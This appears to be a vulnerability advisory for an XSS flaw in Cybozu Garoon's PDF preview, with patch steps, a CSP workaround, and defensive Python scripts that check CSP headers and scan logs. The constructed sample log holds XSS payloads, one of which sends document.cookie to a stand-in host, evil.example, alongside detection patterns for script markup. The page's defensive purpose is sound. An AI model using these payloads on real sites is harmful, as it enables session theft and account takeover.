CVE-2024-39457

5.4 MEDIUM

📋 TL;DR

This is a cross-site scripting (XSS) flaw in the PDF preview feature of Cybozu Garoon. An attacker who can get a crafted PDF in front of other users has its script run in the browser of any logged-in user who previews the file, which can expose that user's session cookie or let the attacker perform actions as them. Organizations running Garoon versions 6.0.0 to 6.0.1 are affected; version 6.0.2 fixes the issue.

💻 Affected Systems

Products:
  • Cybozu Garoon
Versions: 6.0.0 to 6.0.1
Operating Systems: Any OS running Garoon
Default Config Vulnerable: ⚠️ Yes
Notes: All installations within the affected version range are vulnerable by default.

📦 What is this software?

Cybozu Garoon is an enterprise groupware suite from Cybozu, Inc. that combines scheduling, messaging, bulletin boards, workflow and file sharing in one web application and is widely deployed by Japanese organizations. The PDF preview feature renders uploaded PDF attachments in the browser instead of requiring a download, which is the code path this vulnerability lives in.

⚠️ Risk & Real-World Impact

🔴 Worst Case: An attacker steals an administrator's session cookie, gains full administrative access to Garoon, and reaches sensitive organizational data.

🟠 Likely Case: An attacker steals ordinary users' session cookies and impersonates them to read their data and use their privileges.

🟢 If Mitigated: With proper input validation and output encoding in place, the injected script is not executed; the residual impact is at most garbled display of the injected text.

🌐 Internet-Facing: MEDIUM - Exploitation requires a logged-in user to open a malicious PDF preview, but an internet-exposed instance lets any account holder, including phished or otherwise compromised accounts, deliver the file.
🏢 Internal Only: MEDIUM - An insider or a compromised internal account can plant the PDF and wait for a higher-privileged user to preview it, turning the XSS into privilege escalation.

🎯 Exploit Status

Public PoC: No
Weaponized: Unknown
Unauthenticated Exploit: No (the attacker needs a Garoon account, and the victim must be logged in and open the preview)
Complexity: LOW

Exploitation requires a victim to view the malicious PDF preview, but XSS payloads are well documented and easy to craft, so the only real barrier is getting the file in front of a user.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 6.0.2

Vendor Advisory: https://kb.cybozu.support/?product=garoon&v=&fv=6.0.2&t=%E8%84%86%E5%BC%B1%E6%80%A7&f=&r=&b=&s=&posts_per_page=20

Restart Required: Yes

Instructions:

1. Back up your Garoon installation.
2. Download Garoon 6.0.2 from Cybozu support.
3. Follow the official upgrade guide.
4. Restart the Garoon service.
5. Verify that the version shows 6.0.2.

🔧 Temporary Workarounds

Disable PDF preview functionality (all platforms)

Temporarily disable the PDF preview feature in Garoon; this removes the vulnerable code path until you can upgrade.

Implement Content Security Policy (all platforms)

Add a CSP header at the web server in front of Garoon to restrict where scripts may load from, for example:

Content-Security-Policy: default-src 'self'; script-src 'self'

This is defence in depth, not a fix: it only helps if the policy forbids inline script and is served on the preview response, and a policy this strict may break Garoon's own pages. Test it in a staging environment first, and use Content-Security-Policy-Report-Only to observe violations before switching to the enforcing header.
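Because a CSP only mitigates this XSS if it actually refuses injected script, it is worth checking the policy you end up serving rather than trusting that the header is present. The following is an added example for this page, not code from Cybozu or Garoon: it parses a Content-Security-Policy value and reports whether it blocks the two ways an injected payload runs (inline script, and script loaded from an attacker-chosen URL). The policy strings are constructed samples; the first is the header the workaround above recommends. Feed it the enforcing header returned by the Garoon preview page (the Report-Only header does not block anything).

```python
"""Check whether a Content-Security-Policy header would block injected script.

Added example for this page; not Cybozu or Garoon code. The policy strings
in SAMPLE_POLICIES are constructed samples.
"""

from typing import Optional

# CSP Level 2+: once a nonce or hash source is present, 'unsafe-inline' is
# ignored, so inline script without the secret nonce/hash is refused.
NONCE_OR_HASH = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")
# Sources that let injected markup load attacker-controlled script by URL
# (e.g. <script src="data:..."> or from any https host).
OPEN_URL_SOURCES = {"*", "data:", "blob:", "http:", "https:"}


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a CSP header into {directive: [source expressions]}."""
    policy: dict[str, list[str]] = {}
    for clause in header.split(";"):
        tokens = clause.split()
        if not tokens:
            continue
        name, sources = tokens[0].lower(), tokens[1:]
        policy.setdefault(name, sources)  # a repeated directive is ignored per spec
    return policy


def script_sources(policy: dict[str, list[str]]) -> Optional[list[str]]:
    """Effective script sources: script-src, else default-src, else unrestricted."""
    if "script-src" in policy:
        return policy["script-src"]
    return policy.get("default-src")


def blocks_injected_script(header: str) -> bool:
    """True if the policy refuses both inline script and script loaded from
    arbitrary URLs, the two ways an XSS payload in a preview page can run."""
    sources = script_sources(parse_csp(header))
    if sources is None:
        return False  # neither script-src nor default-src: scripts are unrestricted
    lowered = [s.lower() for s in sources]
    has_nonce_or_hash = any(s.startswith(NONCE_OR_HASH) for s in lowered)
    allows_inline = "'unsafe-inline'" in lowered and not has_nonce_or_hash
    allows_any_url = any(s in OPEN_URL_SOURCES for s in lowered)
    return not (allows_inline or allows_any_url)


# Constructed sample headers (assumed, not captured from a real Garoon host).
SAMPLE_POLICIES = {
    "recommended": "default-src 'self'; script-src 'self'",
    "weakened":    "default-src 'self'; script-src 'self' 'unsafe-inline'",
    "nonce":       "script-src 'self' 'nonce-r4nd0m' 'unsafe-inline'",
    "wildcard":    "default-src *",
    "no-script":   "img-src 'self'; style-src 'self'",
    "none":        "default-src 'none'",
}


def evaluate(policies: dict[str, str] = SAMPLE_POLICIES) -> dict[str, bool]:
    """Map each policy name to whether it blocks injected script."""
    return {name: blocks_injected_script(h) for name, h in policies.items()}


if __name__ == "__main__":
    for name, ok in evaluate().items():
        print(f"{name:12s} {'blocks' if ok else 'ALLOWS'} injected script")
```

The "weakened" sample is the common failure: an admin adds 'unsafe-inline' to stop Garoon's own inline scripts from breaking, and the header silently stops protecting the preview page. The "nonce" sample shows the correct way to keep inline scripts working without reopening the hole, but it needs the application to emit per-response nonces, which a reverse proxy alone cannot do.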

🧯 If You Can't Patch

  • Web application firewall rules that look for XSS markers in the text fields submitted with a PDF upload (such as the file name) may catch naive payloads; rules aimed at the PDF body itself are easy to evade and are not a reliable control on their own
  • Restrict PDF uploads to trusted users, validate the file type server side, and review recently uploaded PDFs whose names or metadata contain markup

🔍 How to Verify

Check if Vulnerable:

Check the Garoon version in the administration panel; if it is 6.0.0 or 6.0.1, the system is vulnerable.

Check Version:

Check 'System Information' in Garoon administration interface

Verify Fix Applied:

After patching, confirm that the administration panel shows version 6.0.2 or later.

📡 Detection & Monitoring

Log Indicators:

  • PDF uploads whose file name or other user-supplied text contains script-like content (<script, javascript:, on*= event handlers), including URL- or entity-encoded forms
  • Repeated failed or unusually frequent PDF preview requests for the same file
  • Previews of a suspicious PDF by higher-privileged users shortly after it was uploaded

Network Indicators:

  • HTTP requests containing XSS payloads in PDF-related parameters or upload file names
  • Requests from Garoon users' browsers to unfamiliar external hosts immediately after a PDF preview (possible cookie exfiltration)

SIEM Query:

Illustrative pseudo-query; translate it to your SIEM's query language and to the field names Garoon actually writes:

source="garoon_logs" AND (message="PDF preview" OR message="PDF upload") AND (message CONTAINS "script" OR message CONTAINS "javascript")
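The pseudo-query above matches only literal "script" substrings, so an encoded payload slips past it. Below is an added example for this page, not Garoon code, that runs the same detection logic over log lines and decodes URL and HTML-entity encoding first. The log layout (ISO timestamp, user, event name, key="value" detail) and the event names pdf_upload and pdf_preview are assumptions; map them to the fields Garoon actually writes. The sample lines are constructed.

```python
"""Flag PDF upload/preview log events that carry script-bearing content.

Added example for this page; not Garoon code. The log format, event names
and the sample lines below are constructed assumptions.
"""

import html
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample log. Line 7 carries a URL-encoded payload that a plain
# substring search for "script" would miss.
SAMPLE_LOG = """\
2024-07-01T09:12:03Z alice pdf_upload filename="q2-report.pdf" size=48213
2024-07-01T09:12:09Z bob pdf_preview filename="q2-report.pdf"
2024-07-01T09:15:41Z mallory pdf_upload filename="<script>fetch('//evil.example/?c='+document.cookie)</script>.pdf" size=1102
2024-07-01T09:16:02Z carol pdf_preview filename="<script>fetch('//evil.example/?c='+document.cookie)</script>.pdf"
2024-07-01T09:20:00Z dave message_send body="see <b>attached</b> report"
2024-07-01T09:21:30Z mallory pdf_upload filename="x.pdf" title="<img src=x onerror=alert(1)>"
2024-07-01T09:25:10Z mallory pdf_upload filename="%3Cscript%3Ealert(1)%3C%2Fscript%3E.pdf" size=900
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<user>\S+) (?P<event>\S+) (?P<detail>.*)$")
PDF_EVENTS = {"pdf_upload", "pdf_preview"}
# Script-bearing markup; kept tight so ordinary words do not fire.
PAYLOAD_RE = re.compile(r"<script\b|javascript:|\bon[a-z]+\s*=|<svg\b|<iframe\b", re.I)


@dataclass(frozen=True)
class Hit:
    ts: str
    user: str
    event: str
    detail: str


def normalize(detail: str) -> str:
    """Undo URL and HTML-entity encoding so an encoded payload still matches."""
    return html.unescape(unquote(detail))


def scan_log(text: str) -> list[Hit]:
    """Return the PDF upload/preview events whose detail contains script markup."""
    hits: list[Hit] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m or m["event"] not in PDF_EVENTS:
            continue
        if PAYLOAD_RE.search(normalize(m["detail"])):
            hits.append(Hit(m["ts"], m["user"], m["event"], m["detail"]))
    return hits


def suspect_uploaders(hits: list[Hit]) -> set[str]:
    """Accounts that uploaded flagged PDFs: the likely attacker accounts.
    Preview hits are the potential victims whose sessions should be reviewed."""
    return {h.user for h in hits if h.event == "pdf_upload"}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h.ts} {h.event:11s} {h.user:8s} {h.detail}")
    print("suspect uploaders:", sorted(suspect_uploaders(found)))
```

On the sample log this flags mallory's three uploads and carol's preview of the first one; carol is the account whose session should be treated as possibly hijacked, and mallory the account to suspend and investigate.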
